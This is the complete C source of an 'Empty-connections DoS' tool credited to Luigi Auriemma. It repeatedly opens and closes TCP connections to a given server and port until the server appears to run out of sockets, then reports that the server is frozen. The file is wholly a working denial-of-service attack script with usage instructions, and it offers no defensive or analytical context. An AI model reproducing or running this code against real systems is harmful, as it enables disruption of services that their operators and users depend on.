/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define usleep  sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define WAITMS  1



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    u_short port;
    int     sd,
            i,
            err,
            waitms = WAITMS,
            toutums;
    struct  sockaddr_in     peer;
    struct  timeval tout;
    fd_set  fd_read;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Empty-connections DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\nUsage: %s <server> <port> [milliseconds(%d)]\n"
            "\n"
            "If you set milliseconds to 0, the tool will not do the check to know if the\n"
            "server has finished the available sockets (freezed)\n"
            "\n"
            "Note: the check enabled in this tool runs fine only if the server doesn't send\n"
            "      data when the connection is made, as webservers for example. For other\n"
            "      types of servers use 0 milliseconds or modify the source code\n"
            "\n", argv[0], WAITMS);
        exit(1);
    }

    if(argc > 3) waitms = atoi(argv[3]);
    toutums = waitms * 1000;

#ifndef WIN32
    waitms *= 1000;
#endif

    port                 = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\n"
        "Connecting to %s:%hu\n\n",
        inet_ntoa(peer.sin_addr), port);

    i = 1;
    while(1) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        if(waitms) {
            tout.tv_sec  = 0;
            tout.tv_usec = toutums;
            FD_ZERO(&fd_read);
            FD_SET(sd, &fd_read);
            err = select(sd + 1, &fd_read, NULL, NULL, &tout);
            if(err < 0) std_err();
            if(err) break;
        }

        close(sd);
        printf("%d\r", i++);
        usleep(waitms);
    }

    fputs("\nServer should have finished the available sockets, it is freezed now\n", stdout);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


